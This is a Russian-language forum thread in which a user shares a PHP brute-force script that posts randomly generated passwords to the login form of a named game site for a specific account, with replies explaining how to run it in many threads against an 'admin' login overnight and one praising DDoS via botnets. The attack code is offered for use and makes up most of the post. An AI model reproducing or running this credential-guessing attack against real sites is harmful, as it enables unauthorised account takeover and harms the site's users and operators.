взлом пароля (брутфорс)

вот написал скрипт для подбора паролей(на вашем сервере должна быть библиотека cURL php)

залить в одну дерикторию

word.txt - в нём редактируете символы которые будут подбираться

Код:

1
2
3
4
5
6
7
8
9
0

brut.php - открывать его

Код:

<?
//script by Botchal

$i=0;
while($i<10000){$i++;
$result = file_get_contents("http://127.0.0.1/test/test.php");
if($result==""){}else{die("$result");}

}

?>

test.php - надо настроить пост запросы и адрес клиента

Код:

<? 

$i=0;

//while($i<1){$i++;
if(isset($_GET['stop'])){BREAK;}
$data = file("word.txt"); 
$total = count($data); 

$s1 = mt_rand(0, $total-1); 
$s2 = mt_rand(0, $total-1); 
$s3 = mt_rand(0, $total-1); 
$s4 = mt_rand(0, $total-1); 
$s5 = mt_rand(0, $total-1); 
$s6 = mt_rand(0, $total-1); 
$s7 = mt_rand(0, $total-1); 
$s8 = mt_rand(0, $total-1); 
$s9 = mt_rand(0, $total-1); 
$s10 = mt_rand(0, $total-1); 

$result_R = 
$data[$s1].
$data[$s2].
$data[$s3].
$data[$s4];
$X = str_replace("\r\n", "", $result_R);     




////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////




$ua = "User-Agent: Botchal Bot 1.0 (compatible; MSIE 5.01; Widows NT)"; // ну, или что больше нравится 
$ref = 'http://pw.g-gam1ng.ru/login.php'; // обычно адрес на котором сама форма 
$ch=curl_init ("http://pw.g-gam1ng.ru/login.php"); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt ($ch, CURLOPT_HEADER, 0); // для отладки можно оставить 1 
curl_setopt ($ch, CURLOPT_NOBODY, 1); // чтобы не выводил саму страницу (она пока не нужна) 
curl_setopt($ch, CURLOPT_USERAGENT, $ua); 
curl_setopt($ch, CURLOPT_REFERER, $ref); // некоторые проверяют 
curl_setopt($ch, CURLOPT_POST, 1); // метод POST 
curl_setopt($ch, CURLOPT_POSTFIELDS, "login=serega12&pass=".$X.""); 
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); // это может понадобиться если будет редирект 
curl_setopt($ch, CURLOPT_TIMEOUT, 3);

for ($i=0; $i<sizeof($cookie); $i++) 
{ 
  curl_setopt($ch, CURLOPT_COOKIE, $cookie[$i]); // шлём cookie 
} 

$html = curl_exec($ch); 
curl_close($ch); 


//}



//echo $html;
preg_match_all( '#<div class=block2 style="halign:left;"><div class=capt_head><table style="marign:0;padding:0;width:100%;"><tr><td><b>(.+?)</b></td><td align=right>#is', $html, $matches );
foreach ( $matches[1] as $value )


if($value != ""){die("НАШЁЛ - {$X}");}









?>

[war]Slink не одобряе[/war]

[war2]А Botchal одобряе[/war2]

С каких это пор ты начал заниматся Взломами?

Да не с каких, просто написал

Я чот не врубился он на своем сервере пароль подбирает к аку которрый у себя зареган?

нет! берёш ставишь Unix значит, мультирежим, несколько потоков(1поток ето надо 50Kbit) вводиш все символы, адрес до цели, логин admin и идёшь спать,

утром встаёш и опракидываешь сервер цели

я подбирал пароль на windows платформе вида 3759382746 2 часа, думаю что ты понял что скрипт надо доработать чтоб по всем количествам символов пробывал, ну либо много потоков и каждый со своим числом

Сорри за нупство что такое Unix =)))

Веб бруты не тру имхо...тру тока ддос с ботнетом в 200кк

Брут на php? А можно узнать, сколько времени уйдет, чтобы подобрать пароль qwerty? :mellow: